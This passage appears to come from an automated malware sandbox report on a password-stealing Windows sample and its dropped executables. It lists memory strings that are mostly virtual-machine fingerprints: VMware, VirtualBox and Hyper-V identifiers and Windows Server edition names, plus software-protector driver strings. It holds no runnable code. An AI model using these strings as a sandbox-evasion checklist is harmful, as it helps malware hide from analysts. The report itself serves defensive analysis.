                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: vmware
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: "Windows 8 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: BGIIDAEBGC.exe, BGIIDAEBGC.exe, 00000005.00000002.1905859514.0000000000698000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, explorti.exe, 00000008.00000002.4133646158.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2140291996.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2741569840.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.3340026597.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000010.00000002.3940679044.00000000009A8000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
                        Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Hyper-V (guest)
                        Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Microsoft Hyper-V Server
                        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000114C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000048C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ~VirtualMachineTypes
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000114C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000048C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000114C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000048C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: )Windows 8 Server Standard without Hyper-V
                        Source: BGIIDAEBGC.exe, 00000005.00000002.1905859514.0000000000698000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000008.00000002.4133646158.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.2140291996.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.2741569840.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000F.00000002.3340026597.00000000009A8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000010.00000002.3940679044.00000000009A8000.00000040.00000001.01000000.0000000D.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: %Windows 2012 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Hyper-V
                        Source: Amcache.hve.4.drBinary or memory string: VMware
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: $Windows 8.1 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ,Windows 2012 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B2A000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000008.00000002.4134557911.00000000012F7000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000008.00000002.4134557911.0000000001324000.00000004.00000020.00020000.00000000.sdmp, a37ec701f3.exe, 0000000B.00000002.1970868241.000000000146C000.00000004.00000020.00020000.00000000.sdmp, a37ec701f3.exe, 0000000B.00000002.1970868241.000000000144B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Standard without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: %Windows 2016 Microsoft Hyper-V Server
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: +Windows 8.1 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
                        Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: a37ec701f3.exe, 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
                        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware2u
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, a37ec701f3.exe, 0000000B.00000002.1969439309.000000000035C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
